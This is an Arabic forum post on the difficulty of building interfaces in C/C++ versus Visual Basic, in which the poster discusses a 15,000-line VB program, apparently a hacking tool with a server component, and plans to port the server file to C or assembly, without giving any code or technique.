نقطة التصميم ، صدقنى تصميم الواجهات على السى صعب للغايه ، لقت صممت برنامج بالسى ++ بإستخدام OPENgl أيضا و كان dos application ، كانت واجهه واحده ولكنى تعبت جدا لأجعلها RESIZEABLE و وضع جميع المربعات والأزرار فى مكانها ، مع كل زرار أنه عند الضغط عليه يجب وجود تأثير لذلك و عند إختيار زر معين (لون معين) يتم سحب الإختيار السابق و تعليم اللون الجديد ، هذا صعب ، لذلك تم إنشاء اللغات الفجوال لتغطية هذه الإحتياجات ،

أقولها ثانيا ، لو تم عمل برنامج TEXT BASED NOT VISUAL تحت السى بأوامر كتابيه من برامج الإختراق ، سيكون برنامج جبار جبار و لكنه سيحتاج لبرمجه وكمية أكودا عجيبه لإنتاجه .

فى هذا البرنامج تم كتابة 15000 سطر كود ، عند تحويلهم لسى ، ممم ...

تخيل العدد الناتج !!!؟

أخى HGB يمكن حقن ال vb runtime dll file فى ملفات ال exe ولكنه سيكون كما ذكرت بالظبط (حجم مروع) . وجهة نظرى فى إستعمالى فجوال بيسيك مع أخذ إعتبارى من هذه النقطه هو أن معظم النظم العامله الأن تدعم هذه الملفات من أمثال (win NT'S ) وهذه النظم هى ما أهدف إليها فى أو شريحه ، إذا نجحت سيكون على تحويل ملف السيرفر فقط إلى سى أو أسمبلى للإصدار الثانى :) .

0

شارك هذا الرد


رابط المشاركة
شارك الرد من خلال المواقع ادناه
زوار
This topic is now closed to further replies.

  • يستعرض القسم حالياً   0 members

    لا يوجد أعضاء مسجلين يشاهدون هذه الصفحة .